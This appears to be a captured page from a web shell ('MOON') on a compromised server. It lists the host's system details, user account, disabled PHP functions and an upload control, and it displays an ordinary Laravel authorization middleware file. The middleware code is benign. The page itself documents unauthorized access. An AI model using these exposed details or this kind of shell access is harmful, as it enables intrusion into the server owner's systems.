MOON
Server: Apache
System: Linux e2e-78-16.ssdcloudindia.net 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
User: imensosw (1005)
PHP: 8.0.30
Disabled: exec,passthru,shell_exec,system
$ pwd: /home/imensosw/.trash/app/Http/Middleware/
Upload Files
File: /home/imensosw/.trash/app/Http/Middleware/CheckIsAdminOrSelf.php
<?php

namespace App\Http\Middleware;

use Closure;
use Illuminate\Support\Facades\Auth;

class CheckIsAdminOrSelf
{


    public function handle($request, Closure $next)
    {
        $requestedUserId = $request->route()->parameter('id');

        if (Auth::user()->role === 1 || Auth::user()->id == $requestedUserId) {
            return $next($request);
        } else {
            return response()->json(['error' => 'Unauthorized'], 403);
        }
    }
    //end handle()
}
//end class
@ Telegram